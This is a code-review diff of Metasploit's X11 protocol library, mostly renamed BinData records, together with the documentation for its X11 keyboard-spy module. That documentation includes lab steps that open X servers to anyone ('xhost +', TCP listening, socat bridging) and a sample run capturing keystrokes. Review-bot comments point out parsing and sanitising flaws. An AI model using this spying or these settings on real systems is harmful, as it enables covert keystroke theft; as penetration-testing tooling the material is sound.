diff --git a/documentation/modules/auxiliary/gather/x11_keyboard_spy.md b/documentation/modules/auxiliary/gather/x11_keyboard_spy.md
index 698e35608fcf..2e091014900a 100644
--- a/documentation/modules/auxiliary/gather/x11_keyboard_spy.md
+++ b/documentation/modules/auxiliary/gather/x11_keyboard_spy.md
@@ -19,21 +19,21 @@ displayed at poll time. Keys may be repeated or missing.
1. `sudo nano /etc/gdm/gdm.schemas`
2. Find:
-```
-
- security/DisallowTCP
- b
- true
-
-```
-- Change `true` to `false`
+ ```
+
+ security/DisallowTCP
+ b
+ true
+
+ ```
+ - Change `true` to `false`
3. logout or reboot
-4. Verification: `sudo netstat -antp | grep 6000`
+4. Verification: ```sudo netstat -antp | grep 6000```
-```
-tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X
-```
+ ```
+ tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X
+ ```
5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
@@ -42,17 +42,17 @@ tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN
1. `sudo nano /etc/lightdm/lightdm.conf`
2. Under the `[SeatDefaults]` area, add:
-```
-xserver-allow-tcp=true
-allow-guest=true
-```
+ ```
+ xserver-allow-tcp=true
+ allow-guest=true
+ ```
3. logout or reboot
-4. Verification: `sudo netstat -antp | grep 6000`
+4. Verification: ```sudo netstat -antp | grep 6000```
-```
-tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X
-```
+ ```
+ tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X
+ ```
5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
@@ -65,9 +65,9 @@ tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN
1. `vi /etc/gdm/custom.conf`
2. Under the `[security]` area, add:
-```
-DisallowTCP=false
-```
+ ```
+ DisallowTCP=false
+ ```
3. logout/reboot
4. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
@@ -88,8 +88,7 @@ Getting X11 to listen on a TCP port is rather taxing, so we use socat to facilit
1. `sudo apt-get install ubuntu-desktop socat` # overkill but it gets everything we need
2. `sudo reboot` # prob a good idea since so much was installed
3. `sudo xhost +` # must be done through gui, not through SSH
-4. `socat -d -d TCP-LISTEN:6000,fork,bind= UNIX-CONNECT:/tmp/.X11-unix/X0`, you may need to
-use `X1` instead of `X0` depending on context.
+4. `socat -d -d TCP-LISTEN:6000,fork,bind= UNIX-CONNECT:/tmp/.X11-unix/X0`, you may need to use `X1` instead of `X0` depending on context.
## Verification Steps
@@ -122,23 +121,23 @@ msf6 auxiliary(gather/x11_keyboard_spy) > run
[*] Running module against 127.0.0.1
[*] 127.0.0.1:6000 - Establishing TCP Connection
-[*] 127.0.0.1:6000 - (1/9) Establishing X11 connection
+[*] 127.0.0.1:6000 - [1/9] Establishing X11 connection
[-] 127.0.0.1:6000 - Connection packet malfored (size: 8192), attempting to get read more data
[+] 127.0.0.1:6000 - Successly established X11 connection
[*] 127.0.0.1:6000 - Version: 11.0
[*] 127.0.0.1:6000 - Screen Resolution: 958x832
[*] 127.0.0.1:6000 - Resource ID: 33554432
[*] 127.0.0.1:6000 - Screen root: 1320
-[*] 127.0.0.1:6000 - (2/9) Checking on BIG-REQUESTS extension
+[*] 127.0.0.1:6000 - [2/9] Checking on BIG-REQUESTS extension
[+] 127.0.0.1:6000 - Extension BIG-REQUESTS is present with id 134
-[*] 127.0.0.1:6000 - (3/9) Enabling BIG-REQUESTS
-[*] 127.0.0.1:6000 - (4/9) Creating new graphical context
-[*] 127.0.0.1:6000 - (5/9) Checking on XKEYBOARD extension
+[*] 127.0.0.1:6000 - [3/9] Enabling BIG-REQUESTS
+[*] 127.0.0.1:6000 - [4/9] Creating new graphical context
+[*] 127.0.0.1:6000 - [5/9] Checking on XKEYBOARD extension
[+] 127.0.0.1:6000 - Extension XKEYBOARD is present with id 136
-[*] 127.0.0.1:6000 - (6/9) Enabling XKEYBOARD
-[*] 127.0.0.1:6000 - (7/9) Requesting XKEYBOARD map
-[*] 127.0.0.1:6000 - (8/9) Enabling notification on keyboard and map
-[*] 127.0.0.1:6000 - (9/9) Creating local keyboard map
+[*] 127.0.0.1:6000 - [6/9] Enabling XKEYBOARD
+[*] 127.0.0.1:6000 - [7/9] Requesting XKEYBOARD map
+[*] 127.0.0.1:6000 - [8/9] Enabling notification on keyboard and map
+[*] 127.0.0.1:6000 - [9/9] Creating local keyboard map
[+] 127.0.0.1:6000 - All setup, watching for keystrokes
t
e
diff --git a/lib/msf/core/exploit/remote/x11.rb b/lib/msf/core/exploit/remote/x11.rb
index 81bd61415e25..b87099d84a09 100644
--- a/lib/msf/core/exploit/remote/x11.rb
+++ b/lib/msf/core/exploit/remote/x11.rb
@@ -13,40 +13,43 @@ module Msf::Exploit::Remote::X11
include Msf::Exploit::Remote::X11::Keysymdef
include Msf::Exploit::Remote::X11::Window
- class X11GETPROPERTYRESPONSE < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__get__property__reply__t.html
+ class X11GetPropertyResponse < BinData::Record
endian :little
uint8 :reply
uint8 :format
uint16 :sequence_number # GetProperty
- uint32 :reply_length
+ uint32 :response_length
uint32 :get_property_type # 8bit boolean, \x01 == true \x00 == false
uint32 :bytes_after
uint32 :value_length
- uint32 :unused
- uint32 :unused1
- uint32 :unused2
+ uint32 :pad0
+ uint32 :pad1
+ uint32 :pad2
string :value_data, read_length: -> { value_length }
end
- class X11GETPROPERTYREQUEST < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__get__property__request__t.html
+ class X11GetPropertyRequest < BinData::Record
endian :little
uint8 :opcode, value: 20 # GetProperty
uint8 :delete_field, initial_value: 0 # \x00 false, assuming \x01 true?
uint16 :request_length, value: -> { num_bytes / 4 }
- uint32 :window # X11CONNECTION.screen_root
+ uint32 :window # X11ConnectionResponse.screen_root
uint32 :property, initial_value: 23 # "\x17\x00\x00\x00" RESOURCE_MANAGER
uint32 :get_property_type, initial_value: 31 # "\x1f\x00\x00\x00" # get-property-type (31 = string)
uint32 :long_offset, value: 0
uint32 :content_length, value: 100_000_000 # "\x00\xe1\xf5\x05"
end
- class X11CREATEGRAPHICALCONTEXTREQUEST < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__create__gc__request__t.html
+ class X11CreateGraphicalContextRequest < BinData::Record
endian :little
uint8 :opcode, value: 55 # CreateGC (CreateGraphicalContext)
- uint8 :unused
+ uint8 :pad0
uint16 :request_length, value: -> { num_bytes / 4 }
- uint32 :cid # X11CONNECTION.resource_id
- uint32 :drawable # X11CONNECTION.screen_root
+ uint32 :cid # X11ConnectionResponse.resource_id
+ uint32 :drawable # X11ConnectionResponse.screen_root
# gc-value-mask mappings from wireshark, uint32 total size
# .... .... .... .... .... .... .... ...0 = function: False
# .... .... .... .... .... .... .... ..0. = plane-mask: False
@@ -103,42 +106,47 @@ class X11CREATEGRAPHICALCONTEXTREQUEST < BinData::Record
uint32 :background, initial_value: 16777215
end
- class X11FREEGRAPHICALCONTEXTREQUEST < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__free__gc__request__t.html
+ class X11FreeGraphicalContextRequest < BinData::Record
endian :little
uint8 :opcode, value: 60 # FreeGC
- uint8 :unused, value: 1
+ uint8 :pad0, value: 1
uint16 :request_length, value: -> { num_bytes / 4 }
- uint32 :gc # X11CONNECTION.resource_id_base
+ uint32 :gc # X11ConnectionResponse.resource_id_base
end
- class X11GETINPUTFOCUSREQUEST < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__get__input__focus__request__t.html
+ class X11GetInputFocusRequest < BinData::Record
endian :little
uint8 :opcode, value: 43 # GetInputFocus
- uint8 :unused
+ uint8 :pad0
uint16 :request_length, value: -> { num_bytes / 4 }
end
- class X11INTERNATOMREQUEST < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__intern__atom__request__t.html
+ class X11InternAtomRequest < BinData::Record
endian :little
uint8 :opcode, value: 16 # InternAtom
uint8 :only_if_exists, initial_value: 0 # 0 false, 1 true?
uint16 :request_length, value: -> { num_bytes / 4 }
uint16 :name_length, value: -> { name.to_s.gsub(/\x00+\z/, '').length } # cut off the \x00 padding
- uint16 :unused, initial_value: 0
+ uint16 :pad0, initial_value: 0
string :name, trim_padding: true
end
- class X11INTERNATOMRESPONSE < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__intern__atom__reply__t.html
+ class X11InternAtomResponse < BinData::Record
endian :little
uint8 :reply
- uint8 :unused
+ uint8 :pad0
uint16 :sequence_number
- uint32 :reply_length
+ uint32 :response_length
uint32 :atom
- rest :pad
+ rest :pad1
end
- class X11ERROR < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__generic__error__t.html
+ class X11Error < BinData::Record
endian :little
uint8 :response_type # 0 = Error, 1 = Reply
uint8 :error_code # 8 = BadMatch
@@ -146,6 +154,6 @@ class X11ERROR < BinData::Record
uint32 :bad_value
uint16 :minor_opcode
uint16 :major_opcode
- uint8 :unused
+ uint8 :pad0
end
end
diff --git a/lib/msf/core/exploit/remote/x11/connect.rb b/lib/msf/core/exploit/remote/x11/connect.rb
index 742dc7aeb680..1099e6763ca1 100644
--- a/lib/msf/core/exploit/remote/x11/connect.rb
+++ b/lib/msf/core/exploit/remote/x11/connect.rb
@@ -8,7 +8,7 @@
module Msf::Exploit::Remote::X11::Connect
# https://xcb.freedesktop.org/manual/structxcb__visualtype__t.html
- class X11VISUALTYPE < BinData::Record
+ class X11VisualType < BinData::Record
endian :little
uint32 :visualid
uint8 :visual_type_classclass
@@ -20,35 +20,36 @@ class X11VISUALTYPE < BinData::Record
uint32 :pad
end
- class X11DEPTHDETAIL < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__depth__t.html
+ class X11DepthDetail < BinData::Record
endian :little
uint8 :depth
- uint8 :pad
+ uint8 :pad0
uint16 :visualtypes_numbers
uint32 :pad1
array :depth_detail,
- type: :X11VISUALTYPE,
+ type: :X11VisualType,
initial_length: :visualtypes_numbers
end
# https://xcb.freedesktop.org/manual/structxcb__format__t.html
- class X11PIXMAPFORMAT < BinData::Record
+ class X11PixMapFormat < BinData::Record
endian :little
uint8 :depth
uint8 :bits_per_pixel
uint8 :scanline_pad
- uint8 :pad
+ uint8 :pad0
uint32 :pad1
end
# https://xcb.freedesktop.org/manual/structxcb__setup__t.html
- class X11CONNECTION < BinData::Record
+ class X11ConnectionResponse < BinData::Record
endian :little
uint8 :success # 8bit boolean, \x01 == true \x00 == false
- uint8 :pad
+ uint8 :pad0
uint16 :protocol_version_major
uint16 :protocol_version_minor
- uint16 :reply_length
+ uint16 :response_length
uint32 :release_number
uint32 :resource_id_base
uint32 :resource_id_mask
@@ -63,10 +64,10 @@ class X11CONNECTION < BinData::Record
uint8 :bitmap_format_scanline_pad
uint8 :min_keycode
uint8 :max_keycode
- uint32 :pad2
+ uint32 :pad1
string :vendor, read_length: :vendor_length
array :pixmap_formats,
- type: :X11PIXMAPFORMAT,
+ type: :X11PixMapFormat,
initial_length: :number_of_formats_in_pixmap_formats
# screen subsection
@@ -87,20 +88,37 @@ class X11CONNECTION < BinData::Record
uint8 :screen_root_depth
uint8 :screen_allowed_depths_len
array :depth_detail,
- type: :X11DEPTHDETAIL,
+ type: :X11DepthDetail,
initial_length: :screen_allowed_depths_len
end
# https://xcb.freedesktop.org/manual/structxcb__setup__request__t.html
- class X11CONNECTIONREQUEST < BinData::Record
+ class X11ConnectionRequest < BinData::Record
# only 1/2 implemented since we dont have any authorization items added
endian :little
uint8 :byte_order, value: 108 # Little-endian
- uint8 :pad, value: 0
+ uint8 :pad0, value: 0
uint16 :protocol_version_major, value: 11
uint16 :protocol_version_minor, value: 0
uint16 :authorization_protocol_name_length, value: 0
uint16 :authorization_protocol_data_length, value: 0
- uint16 :pad2, value: 0
+ uint16 :pad1, value: 0
+ end
+
+ def print_connection_info(connection, ip, port)
+ print_good("#{ip} - Successly established X11 connection")
+ vprint_status(" Vendor: #{connection.vendor}")
+ vprint_status(" Version: #{connection.protocol_version_major}.#{connection.protocol_version_minor}")
+ vprint_status(" Screen Resolution: #{connection.screen_width_in_pixels}x#{connection.screen_height_in_pixels}")
+ vprint_status(" Resource ID: #{connection.resource_id_base.inspect}")
+ vprint_status(" Screen root: #{connection.screen_root.inspect}")
+ report_note(
+ host: ip,
+ proto: 'tcp',
+ sname: 'x11',
+ port: port,
+ type: 'x11.server_vendor',
+ data: "Open X Server (#{connection.vendor})"
+ )
end
end
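Review bot: `connection.vendor` is a length-prefixed string read straight from the server's setup reply, and print_connection_info interpolates it unfiltered into console output and into the `report_note` data. A hostile or broken X server could place control characters or terminal escape sequences there. Unless the print and report helpers already sanitise (not visible here), strip them first, e.g. `vendor = connection.vendor.to_s.gsub(/[^[:print:]]/, '')`. The banner also reads `Successly` where `Successfully` is presumably meant. The method has no comment saying that it records a note in addition to printing, and `port` is not shown in the banner.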
diff --git a/lib/msf/core/exploit/remote/x11/extensions.rb b/lib/msf/core/exploit/remote/x11/extensions.rb
index e1fdcd3c1e2f..6ad5c53083b1 100644
--- a/lib/msf/core/exploit/remote/x11/extensions.rb
+++ b/lib/msf/core/exploit/remote/x11/extensions.rb
@@ -8,12 +8,12 @@
module Msf::Exploit::Remote::X11::Extensions
# https://xcb.freedesktop.org/manual/structxcb__query__extension__reply__t.html
- class QUERYEXTENSIONRESPONSE < BinData::Record
+ class X11QueryExtensionResponse < BinData::Record
endian :little
uint8 :reply
uint8 :pad
uint16 :sequence_number # QueryExtension
- uint32 :reply_length
+ uint32 :response_length
uint8 :present # 8bit boolean, \x01 == true \x00 == false
uint8 :major_opcode # this is the ID of the extension
uint8 :first_event
@@ -21,19 +21,19 @@ class QUERYEXTENSIONRESPONSE < BinData::Record
end
# https://xcb.freedesktop.org/manual/structxcb__query__extension__request__t.html
- class QUERYEXTENSION < BinData::Record
+ class X11QueryExtensionRequest < BinData::Record
endian :little
uint8 :opcode, value: 98 # QueryExtension
- uint8 :pad, value: 0
+ uint8 :pad0, value: 0
uint16 :request_length, value: -> { num_bytes / 4 }
uint16 :extension_length, value: -> { extension.to_s.gsub(/\x00+\z/, '').length } # cut off the \x00 padding
- uint16 :pad2, initial_value: 0 # seems to possibly be a counter for how many times this has been called
+ uint16 :pad1, initial_value: 0 # seems to possibly be a counter for how many times this has been called
string :extension, length: 12, trim_padding: true
end
- class EXTENSIONTOGGLE < BinData::Record
+ class X11ExtensionToggleRequest < BinData::Record
endian :little
- uint8 :opcode # X11QUERYEXTENSIONRESPONSE.major-opcode
+ uint8 :opcode # X11QueryExtensionResponse.major-opcode
uint8 :toggle, initial_value: 0 # 0 enable
uint16 :request_length, value: -> { num_bytes / 4 }
uint16 :wanted_major, onlyif: :versions? # extension major version
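Review bot: The counter field of X11QueryExtensionRequest is now named `pad1`, but the caller in `run` (modules/auxiliary/gather/x11_keyboard_spy.rb) still passes `unused2: query_extension_calls`, a key that matches no field of this record. The counter therefore presumably never reaches the wire field; how BinData treats the unknown key should be confirmed. Since the inline comment says the field looks like a call counter, either pass `pad1: query_extension_calls` at the call site or give the field a name that reflects that use. X11ExtensionToggleRequest continues outside the hunk.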
diff --git a/lib/msf/core/exploit/remote/x11/keysymdef.rb b/lib/msf/core/exploit/remote/x11/keysymdef.rb
index 2a9570f11d45..82ca1ae37365 100644
--- a/lib/msf/core/exploit/remote/x11/keysymdef.rb
+++ b/lib/msf/core/exploit/remote/x11/keysymdef.rb
@@ -10,7 +10,7 @@
#
module Msf::Exploit::Remote::X11::Keysymdef
- KEYSYM_HASH = {
+ X11KEYSYM_HASH = {
65288 => '[BackSpace]', # XK_BackSpace
65289 => '[Tab]', # XK_Tab
65290 => '[Linefeed]', # XK_Linefeed
diff --git a/lib/msf/core/exploit/remote/x11/window.rb b/lib/msf/core/exploit/remote/x11/window.rb
index e1d5d40fd7f0..908f4e43b99a 100644
--- a/lib/msf/core/exploit/remote/x11/window.rb
+++ b/lib/msf/core/exploit/remote/x11/window.rb
@@ -9,16 +9,16 @@
module Msf::Exploit::Remote::X11::Window
# 3 = https://xcb.freedesktop.org/manual/structxcb__get__window__attributes__request__t.html
# 14 = https://xcb.freedesktop.org/manual/structxcb__get__geometry__request__t.html
- class GETREQUEST < BinData::Record
+ class X11GetRequest < BinData::Record
endian :little
uint8 :opcode # 3 = GetWindowAttributes, 14 = GetGeometry
- uint8 :unused # XXX seems to be increasing counter...
+ uint8 :pad # XXX seems to be increasing counter...
uint16 :request_length, value: -> { num_bytes / 4 }
- uint32 :window # X11CONNECTION.screen_root
+ uint32 :window # X11ConnectionResponse.screen_root
end
# https://xcb.freedesktop.org/manual/structxcb__get__window__attributes__reply__t.html
- class GETWINDOWATTRIBUTESRESPONSE < BinData::Record
+ class X11GetWindowAttributeResponse < BinData::Record
endian :little
uint8 :depth
uint16 :visual_id
@@ -38,7 +38,7 @@ class GETWINDOWATTRIBUTESRESPONSE < BinData::Record
end
# https://xcb.freedesktop.org/manual/structxcb__get__geometry__reply__t.html
- class GETGEOMETRYRESPONSE < BinData::Record
+ class X11GetGeometryResponse < BinData::Record
endian :little
uint8 :depth
uint32 :root
@@ -50,12 +50,12 @@ class GETGEOMETRYRESPONSE < BinData::Record
end
# https://xcb.freedesktop.org/manual/structxcb__get__geometry__reply__t.html
- class WINDOWATTRIBUTESGETGEOMETRYRESPONSE < BinData::Record
+ class X11GetWindowAttributesGeometryResponse < BinData::Record
endian :little
uint8 :reply
uint8 :depth
uint16 :sequence_number
- uint32 :reply_length
+ uint32 :response_length
uint32 :root
uint16 :x
uint16 :y
@@ -65,33 +65,33 @@ class WINDOWATTRIBUTESGETGEOMETRYRESPONSE < BinData::Record
end
# https://xcb.freedesktop.org/manual/structxcb__translate__coordinates__request__t.html
- class TRANSLATECOORDINATESREQUEST < BinData::Record
+ class X11TranslateCoordinatesRequest < BinData::Record
endian :little
uint8 :opcode, value: 40 # TranslateCoordinates
- uint8 :unused # XXX seems to be increasing counter...
+ uint8 :pad # XXX seems to be increasing counter...
uint16 :request_length, value: -> { num_bytes / 4 }
- uint32 :src_window # X11CONNECTION.screen_root
- uint32 :dst_window # X11CONNECTION.screen_root
+ uint32 :src_window # X11ConnectionResponse.screen_root
+ uint32 :dst_window # X11ConnectionResponse.screen_root
uint16 :src_x
uint16 :src_y
end
# https://xcb.freedesktop.org/manual/structxcb__query__tree__request__t.html
- class QUERYTREEREQUEST < BinData::Record
+ class X11QueryTreeRequest < BinData::Record
endian :little
uint8 :opcode, value: 15 # QueryTree
- uint8 :unused, initial_value: 1 # XXX counter?
+ uint8 :pad, initial_value: 1 # XXX counter?
uint16 :request_length, value: -> { num_bytes / 4 }
- uint32 :drawable # X11CONNECTION.screen_root
+ uint32 :drawable # X11ConnectionResponse.screen_root
end
# https://xcb.freedesktop.org/manual/structxcb__query__tree__reply__t.html
- class QUERYTREERESPONSE < BinData::Record
+ class X11QueryTreeResponse < BinData::Record
endian :little
uint8 :reply
- uint8 :unused
+ uint8 :pad0
uint16 :sequence_number
- uint32 :reply_length
+ uint32 :response_length
uint32 :root_window
uint32 :parent_window
uint32 :children_len
@@ -104,12 +104,12 @@ class QUERYTREERESPONSE < BinData::Record
end
# https://xcb.freedesktop.org/manual/structxcb__get__image__request__t.html
- class GETIMAGEREQUEST < BinData::Record
+ class X11GetImageRequest < BinData::Record
endian :little
uint8 :opcode, value: 73 # GetImage
uint8 :image_pixmap_format, initial_value: 2 # zpixmap, better than 0 xypixmap
uint16 :request_length, value: -> { num_bytes / 4 }
- uint32 :drawable # window/X11CONNECTION.screen_root
+ uint32 :drawable # window/X11ConnectionResponse.screen_root
uint16 :x
uint16 :y
uint16 :width
@@ -118,23 +118,23 @@ class GETIMAGEREQUEST < BinData::Record
end
# https://xcb.freedesktop.org/manual/structxcb__get__image__reply__t.html
- class GETIMAGERESPONSE < BinData::Record
+ class X11GetImageResponse < BinData::Record
endian :little
uint8 :response_type
uint8 :depth
uint16 :sequence_number
- uint32 :reply_length
+ uint32 :response_length
uint32 :visual_id
array :image_data,
type: :uint8,
- initial_length: :reply_length
+ initial_length: :response_length
end
# https://xcb.freedesktop.org/manual/structxcb__query__colors__request__t.html
- class GETCOLORSREQUEST < BinData::Record
+ class X11GetColorsRequest < BinData::Record
endian :little
uint8 :opcode, value: 91 # QueryColors
- uint8 :unused
+ uint8 :pad0
uint16 :request_length, value: -> { num_bytes / 4 }
uint32 :color_map
array :pixels,
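Review bot: In X11GetImageResponse, `image_data` is read as `response_length` single bytes, but the X11 reply length field counts 4-byte units after the fixed 32-byte reply, so this likely consumes only part of the pixel data. The linked xcb_get_image_reply_t also has padding after `visual` that the record does not model. Because the value is server-supplied, the byte count is better derived explicitly once the pad is added, e.g. `initial_length: -> { response_length * 4 }`, and confirmed against a capture. A similar mismatch may explain the `-ish` comment on X11Color in the next hunk: xcb_rgb_t places its pad after `blue`, and the QueryColors reply carries unused bytes after `colors_len` that X11GetColorsResponse omits.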
@@ -142,34 +142,35 @@ class GETCOLORSREQUEST < BinData::Record
read_until: :eof
end
- class COLOR < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__rgb__t.html -ish, as the first pixel seems unused
+ class X11Color < BinData::Record
endian :little
- uint16 :pixel
+ uint16 :pad0
uint16 :red
uint16 :green
uint16 :blue
end
# https://xcb.freedesktop.org/manual/structxcb__query__colors__reply__t.html
- class GETCOLORSRESPONSE < BinData::Record
+ class X11GetColorsResponse < BinData::Record
endian :little
uint8 :response_type
- uint8 :unused
+ uint8 :pad0
uint16 :sequence
- uint32 :reply_length
+ uint32 :response_length
uint16 :colors_len
array :colors,
initial_length: :colors_len,
- type: :COLOR
+ type: :X11Color
end
# https://xcb.freedesktop.org/manual/structxcb__get__window__attributes__reply__t.html
- class GETWINDOWRESPONSE < BinData::Record
+ class X11GetWindowResponse < BinData::Record
endian :little
uint8 :response_type
uint8 :backing_store
uint16 :sequence_number
- uint32 :reply_length
+ uint32 :response_length
uint32 :visual_id
uint16 :window_class
bit8 :bit_gravity
@@ -190,6 +191,24 @@ class GETWINDOWRESPONSE < BinData::Record
end
end
+def create_overlay_map(screen_width, screen_height, windows)
+ # Initialize a 2D array to represent the screen
+ screen = Array.new(screen_height) { Array.new(screen_width, nil) }
+ windows.each_with_index do |window, i|
+ puts window.inspect
+ x, y, width, height = window
+ # Mark the visible region occupied by the window
+ (y...y + height).each do |row|
+ (x...x + width).each do |col|
+ screen[row][col] = i
+ end
+ end
+ end
+ screen.each do |row|
+ puts row.join('')
+ end
+end
+
class X11Image
def initialize(width, height, image_reply, color_reply)
@width = width
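Review bot: create_overlay_map indexes `screen[row][col]` with window geometry that is never clipped to the screen, so a window extending past the bottom raises NoMethodError on nil and negative coordinates silently wrap to the opposite edge. If the geometry comes from server replies (not visible in this hunk), that is remote-controlled input reaching an unchecked index. The function is also defined at file top level, outside the module, and prints with bare `puts`, including a leftover `puts window.inspect`. A clipped version that returns the map and leaves printing to the caller is below. The X11Image class that follows continues outside the hunk.

```ruby
def create_overlay_map(screen_width, screen_height, windows)
  screen = Array.new(screen_height) { Array.new(screen_width, nil) }
  windows.each_with_index do |(x, y, width, height), i|
    # clip each window to the screen; geometry may lie partly or wholly off-screen
    rows = [y, 0].max...[y + height, screen_height].min
    cols = [x, 0].max...[x + width, screen_width].min
    rows.each do |row|
      cols.each { |col| screen[row][col] = i }
    end
  end
  screen
end
```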
@@ -214,6 +233,14 @@ def create_image
# Set pixel color in the image
image[i % width, i / width] = ChunkyPNG::Color.rgb(color.red, color.green, color.blue)
end
+ # (0...height).each do |y|
+ # (0...width).each do |x|
+ # # Extract color information from the pixel data and set the corresponding pixel in the PNG image
+ # color = colors[y+x]
+ # # pixel_color = extract_color_from_z_data(z_data)
+ # image[x, y] = ChunkyPNG::Color.rgb(color.red, color.green, color.blue)
+ # end
+ # end
image
end
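Review bot: The block added to create_image is commented-out code with no explanation of why it is kept; it should be dropped or replaced by a one-line comment stating the intent. If it is meant as a future alternative, note that `colors[y+x]` maps several pixels to the same index; a row-major lookup would be `colors[y * width + x]`. create_image starts outside the hunk.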
diff --git a/lib/msf/core/exploit/remote/x11/xkeyboard.rb b/lib/msf/core/exploit/remote/x11/xkeyboard.rb
index c855c9001276..af85f4fe32a1 100644
--- a/lib/msf/core/exploit/remote/x11/xkeyboard.rb
+++ b/lib/msf/core/exploit/remote/x11/xkeyboard.rb
@@ -7,18 +7,21 @@
#
module Msf::Exploit::Remote::X11::Xkeyboard
- class KEYMODMAP < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__xkb__key__mod__map__t.html
+ class X11KeyModMap < BinData::Record
endian :little
uint8 :keycode
uint8 :mods # bit array, shift, lock, control, 1, 2, 3, 4, 5
end
- class SYM < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__xkb__key__sym__map__iterator__t.html
+ class X11Sym < BinData::Record
endian :little
uint32 :syms
end
- class KEYSYMENTRY < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__xkb__key__sym__map__t.html
+ class X11KeySymEntry < BinData::Record
endian :little
uint32 :kt_index
uint8 :group_info
@@ -26,18 +29,20 @@ class KEYSYMENTRY < BinData::Record
uint16 :n_syms
# next we have a list of syms, length is n_syms
array :key_sym_array,
- type: :SYM,
+ type: :X11Sym,
initial_length: :n_syms
end
- class MODDEF < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__xkb__mod__def__t.html
+ class X11ModDef < BinData::Record
endian :little
uint8 :mask
uint8 :real_mods
uint16 :vmods
end
- class KEYMAPENTRY < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__xkb__kt__map__entry__t.html
+ class X11KeyMapEntry < BinData::Record
endian :little
uint8 :active
uint8 :mods_mask # bit array, shift, lock, control, 1, 2, 3, 4, 5
@@ -47,7 +52,8 @@ class KEYMAPENTRY < BinData::Record
uint16 :pad
end
- class KEYTYPE < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__xkb__key__type__t.html
+ class X11KeyType < BinData::Record
endian :little
uint8 :mods_mask
uint8 :mods_mods
@@ -58,16 +64,17 @@ class KEYTYPE < BinData::Record
uint8 :pad
# next we have a list of KEYMAPENTRY, length is :n_map_entries
array :key_map_array,
- type: :KEYMAPENTRY,
+ type: :X11KeyMapEntry,
initial_length: :n_map_entries
# not sure how to tell how many of these there are
array :key_mods_array,
- type: :MODDEF,
+ type: :X11ModDef,
initial_length: :n_map_entries,
onlyif: -> { has_preserve == 1 }
end
- class GETMAPREQUEST < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__xkb__get__map__request__t.html
+ class X11GetMapRequest < BinData::Record
endian :little
uint8 :xkeyboard_id # opcode
uint8 :extension_minor, value: 8 # GetMap
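Review bot: Two comments still use the old record names after the rename: `# next we have a list of KEYMAPENTRY, length is :n_map_entries` in this hunk, and `# next we have a list of KEYTYPE, length is :total_types` in the X11GetMapReply hunk further down, where the neighbouring comments were updated. Suggest `# next we have a list of X11KeyMapEntry, length is :n_map_entries` and `# next we have a list of X11KeyType, length is :n_types`, since the array there uses `n_types` rather than `total_types`. X11GetMapRequest's body continues outside the hunk.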
@@ -144,13 +151,14 @@ class GETMAPREQUEST < BinData::Record
uint16 :pad
end
- class GETMAPREPLY < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__xkb__get__map__reply__t.html
+ class X11GetMapReply < BinData::Record
endian :little
uint8 :reply
uint8 :device_id
uint16 :sequence_number # xkb-GetMap
- uint32 :reply_length
- uint16 :pad
+ uint32 :response_length
+ uint16 :pad0
uint8 :min_key_code
uint8 :max_key_code
uint16 :presents # needs to be converted to bits...
@@ -179,15 +187,15 @@ class GETMAPREPLY < BinData::Record
uint16 :virtual_mods # bit array
# next we have a list of KEYTYPE, length is :total_types
array :key_types_array,
- type: :KEYTYPE,
+ type: :X11KeyType,
initial_length: :n_types
- # next we have a list of KEYSYMENTRY
+ # next we have a list of X11KeySymEntry
array :key_map_array,
- type: :KEYSYMENTRY,
+ type: :X11KeySymEntry,
initial_length: :n_key_sym
- # next we have a list of KEYMODMAP
+ # next we have a list of X11KeyModMap
array :key_mod_map_array,
- type: :KEYMODMAP,
+ type: :X11KeyModMap,
initial_length: :total_mod_map_key
uint16 :pad2, onlyif: :padding? # this onlyif may be wrong, its a guess for the time being
@@ -196,7 +204,8 @@ def padding?
end
end
- class SELECTEVENTS < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__xkb__select__events__request__t.html
+ class X11SelectEvents < BinData::Record
endian :little
uint8 :xkeyboard_id # opcode
uint8 :extension_minor, value: 1 # SelectEvent
@@ -339,26 +348,29 @@ class SELECTEVENTS < BinData::Record
bit8 :new_keyboard_details_null_pad2, value: 0, onlyif: -> { affect_which_new_keyboard_notify == 1 } # may be others but thats all thats observed and implemented at this point
end
- class QUERYKEYMAPREQUEST < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__query__keymap__request__t.html
+ class X11QueryKeyMapRequest < BinData::Record
endian :little
uint8 :opcode, value: 44 # QueryKeymap
uint8 :pad
uint16 :request_length, value: -> { num_bytes / 4 }
end
- class QUERYKEYMAPREPLY < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__query__keymap__reply__t.html
+ class X11QueryKeyMapReply < BinData::Record
endian :little
uint8 :reply
uint8 :pad
uint16 :sequence_number
- uint32 :reply_length
+ uint32 :response_length
# byte sequence
array :data,
type: :uint8,
read_until: :eof
end
- class BELLREQUEST < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__xkb__bell__request__t.html
+ class X11BellRequest < BinData::Record
endian :little
uint8 :xkeyboard_id # opcode
uint8 :extension_minor, value: 3 # Bell
